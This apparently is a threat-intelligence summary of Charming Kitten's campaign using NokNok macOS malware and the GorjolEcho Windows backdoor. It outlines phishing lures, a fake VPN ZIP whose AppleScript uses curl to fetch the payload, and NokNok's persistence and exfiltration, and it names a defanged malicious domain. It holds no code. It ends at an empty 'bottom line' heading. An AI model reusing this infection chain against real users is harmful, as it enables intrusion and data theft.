Purr-fectly Crafted for Macs: Charming Kitten Introduces NokNok Malware

Diving into details

• The threat actor has made a significant shift in its infection tactics, moving away from macro-based methods that involve malicious Word documents. Instead, the attackers now utilize LNK files to execute their payloads. 
• In terms of the campaign's phishing lures and social engineering techniques, the hackers adopt the guise of U.S. nuclear experts and approach their targets with an enticing proposition to review drafts concerning foreign policy matters.

Targeting both Windows and Macs

• In the case of Windows OS, once Charming Kitten gains the trust of the target, it proceeds to send a malicious link containing a Google Script macro. 
• This link redirects the victim to a Dropbox URL. The final payload employed in this scenario is GorjolEcho, a straightforward backdoor that allows remote operators to send and execute commands.
• However, if the target is using macOS, the hackers send a different link. This link directs the victim to "library-store[.]camdvr[.]org," which hosts a ZIP file disguised as a RUSI (Royal United Services Institute) VPN app. 
• Upon executing the Apple script file found within the archive, a curl command is triggered, fetching the NokNok payload and establishing a backdoor into the victim's macOS system.

What does NokNok do?

• NokNok, after generating a unique system identifier, utilizes a set of four bash script modules to achieve various objectives. These objectives include establishing persistence, establishing communication with the C2 server, and initiating the exfiltration of data to the server.
• As part of its operations, the malware collects system information, such as the operating system version, running processes, and installed applications.
• To ensure the confidentiality of the collected data, NokNok employs encryption techniques and encodes the data in base64 format before exfiltrating it.

The bottom line